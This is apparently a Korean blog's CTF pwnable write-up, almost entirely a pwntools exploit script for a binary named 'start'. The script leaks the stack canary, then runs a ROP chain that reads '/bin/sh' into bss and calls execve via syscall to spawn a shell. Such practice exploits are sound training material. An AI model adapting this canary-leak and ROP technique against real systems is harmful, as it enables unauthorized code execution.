syscall을 이용한 ROP였다.
예전부터 풀어야지 했다가 오늘 풀었따.
from pwn import*
context.log_level = 'debug'
p = process("./start")
read = 0x440300
bss = 0x6cdb68
syscall = 0x468e75
prdi = 0x4005d5
prsi = 0x4017f7
prdx = 0x443776
prax_rdx_rbx = 0x47a6e6
pay1 = "a"*25
p.send(pay1)
p.recvuntil("a"*24)
canary = u64(p.recv(8)) - 0x61
log.info("canary = " + hex(canary))
pay2 = "a"*24
pay2 += p64(canary)
pay2 += "b"*8
#read(0 ,bss, 8)
pay2 += p64(prdi)
pay2 += p64(0)
pay2 += p64(prsi)
pay2 += p64(bss)
pay2 += p64(prdx)
pay2 += p64(8)
pay2 += p64(read)
#syscall setting
pay2 += p64(prax_rdx_rbx)
pay2 += p64(59)
pay2 += p64(0)
pay2 += p64(bss+100)
pay2 += p64(prdi)
pay2 += p64(bss)
pay2 += p64(prsi)
pay2 += p64(bss+100)
pay2 += p64(syscall)
p.sendline(pay2)
p.sendline("exit")
p.sendline("/bin/sh\x00")
p.interactive()
'Hacking > Pwnable' 카테고리의 다른 글
| unlink (0) | 2019.04.08 |
|---|---|
| OpenCTF tyro_heap write up (0) | 2019.04.06 |
| noe.systems double_input local shell (0) | 2019.04.02 |
| Defcon 2015 r0pbaby (0) | 2019.04.01 |
| Codegate 2018 BaskinRobins31 (0) | 2019.04.01 |